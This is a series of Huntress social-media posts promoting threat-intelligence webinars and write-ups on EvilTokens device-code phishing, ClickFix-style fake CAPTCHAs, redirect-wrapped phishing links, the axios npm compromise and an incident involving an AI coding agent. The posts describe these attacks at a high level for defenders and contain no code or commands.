Huntress

That "enter code on your phone" prompt you never question? Big cybercrime built a business around it. You've seen the flow before: → You log into Netflix on your TV. → A code pops up on your screen. → You grab your phone, go to netflix.com/tv, and enter the code. → And you're in! It's legit, it's familiar, and EvilTokens knew that. Instead of sending victims to a fake login page, EvilTokens sent them to a real one. And one pasted code later, they were in, too. On May 5, Casey S., Huntress Threat Intel Analyst, and special guest Sherrod DeGrippo, GM of Global Threat Intelligence at Microsoft Threat Intelligence, are breaking down exactly how it worked and what you can do to protect yourself: https://okt.to/l15YS3

Read Anna Pham's full write-up: https://okt.to/2VPnuU If you’ve ever used a free background remover website, you might have installed malware without even knowing it. You upload a selfie (or maybe a picture of your dog), watch the progress bar spin, and click download, which triggers a prompt to prove you're not a robot. That’s the trap. That click quietly copies a malicious command to your clipboard and instructs you to paste it into the Windows Run dialog box. If you hit enter? You're not verifying anything. You're installing it: a remote access trojan and potentially a credential stealer, too. Rule of thumb: No legit website will ever ask you to copy/paste a command into your system. If it does, close the tab.

Is EvilTokens selling resilience for attackers? Defense in depth is the gold standard, but they've built layered attack infrastructure to match your security stack hop for hop. One of their signatures: wrapping malicious URLs inside trusted security vendor redirects. The emails look clean, the links look legit, but the destination couldn't be shadier. → Cisco Secure Email: 5+ instances as first-hop wrapper → Trend Micro URL Protection: first hop in multiple chains → Mimecast URL Protection: wraps an intermediate redirect One observed chain was even triple-wrapped: SafeLinks → Trend Micro → Cisco Secure Web → final phishing page. The victim's email security stack sees a Cisco or Trend Micro link and waves it right on through. On May 5, Casey S., Huntress Threat Intel Analyst, and special guest Sherrod DeGrippo, GM of Global Threat Intelligence at Microsoft Threat Intelligence, are breaking down this moment in security where threats look just like your workflow. Save your spot for the live event: https://lnkd.in/gUCJ7D_9

For more examples: https://lnkd.in/g4qvfC3t Threat actors are AI’s first power users. They're building workflows around how people actually work, so attacks blend into everyday user behavior, and malicious actions are so well disguised that threat actors can get victims to do their dirty work for them. In this example, Mark O., Huntress EMEA Security Operations Analyst, shows just how little it takes. Using Anthropic's Claude as inspo, he spun up a convincing lookalike site in five minutes, including plugin options, an FAQ section, and step-by-step instructions…that quietly walk the user through installing malware. In an era where attacks don’t look like attacks at all, defenders can't expect perfect behavior. Resilience depends on building systems that catch what humans won’t.

What you're looking at is a real Telegram post from the cybercrime group EvilTokens. This is how the adversary actually uses AI. Look at it! AI log analysis, keyword search, AI-powered explanations. It would’ve fit right in at a booth at RSA, tbh. On May 5, Casey S., Huntress Threat Intel Analyst, and special guest Sherrod DeGrippo, GM of Global Threat Intelligence at Microsoft Threat Intelligence, are breaking down this watershed moment in security where the latest threats look just like release notes. Save your spot for the live event: https://lnkd.in/gUCJ7D_9 Thank you to Flare for sharing these images with us!

How do you backdoor 100 million weekly downloads? Compromise one guy's npm account. 👇 That's how the axios npm attack started in March. A threat actor posing as a company founder reached out to an axios maintainer using a fake Slack workspace, a fake Teams call, and a fake "your system is out of date" prompt. One install later, they had a RAT on his machine and the keys to the axios npm account. In just three hours, Huntress observed 135 endpoints across macOS, Windows, and Linux checking in with the attacker's C2. Google attributed the attack to UNC1069, a North Korean threat actor active since at least 2018. In this month's Tradecraft Tuesday, John Hammond and Logan MacLaren broke it all down alongside Benjamin Read, Director of Strategic Intelligence at Wiz , and Charlie Eriksen, security researcher at Aikido Security. Check out the highlights: https://okt.to/gs9mYk

Attackers are hacking human nature and phishing is the easiest way in. 🎣 The lures look familiar: → E-signature requests → Invoice notifications → Voicemail alerts Boring on purpose. If you can make the lure look routine, you can make the victim do the work for you. We analyzed phishing trends from emails reported by Huntress Managed SAT learners throughout 2025. This is what we found. Check out more in our 2026 Cyber Threat Report: https://lnkd.in/gTyswNGh

This might be one of the most influential incidents you’ve never heard of. In February 2026, a phishing operation called EvilTokens weaponized Railway to stand up token-harvesting infrastructure at machine speed. AI-generated lures tailored to your role and industry. Legit Microsoft auth flows abused by design. Infrastructure running on trusted tooling like AWS and Cloudflare. What do you do when every indicator of compromise is novel? On May 5, Casey S. from Huntress and special guest Sherrod DeGrippo from Microsoft Threat Intelligence are breaking down what happened, why it worked, and what defenders can do about it. Save your spot for the live event. 👇 #MSPartner

In March, the Huntress SOC came across a super strange incident: A developer was using OpenAI’s Codex AI agent to build two applications...at the same time as they were using Codex to respond to malicious behavior on their Linux system. Codex masked some symptoms, like the loud fan from a cryptominer. But it couldn’t actually remediate the threat, and the commands it generated made triage a lot noisier. Then, the user installed the Huntress agent, and our SOC got to work. This story picks up from the SOC’s perspective as they dig into the incident, navigating a complex investigation with three totally different storylines: a legit developer building web apps, multiple threat actors dropping payloads and setting up persistence, and an AI agent churning out noise in the background. Special thanks to James Northey, John Hammond, Tanner Filip, and Lindsey O'Donnell-Welch for their contributions to this write-up. Let’s dive in: https://okt.to/Quo0OZ

If you’re seeing this, cybercriminals might already have all they need to wreck you. We’ve all left a digital trail. 🤳 But with every job update and profile photo comes a data point attackers can use against you. In the next episode of Huntress _declassified, Truman Kain and Caitlin Sarian, aka "Cybersecurity Girl," will reveal how your online presence becomes intel and what you can do to make yourself harder to target. Register now: https://lnkd.in/gC6Myx8b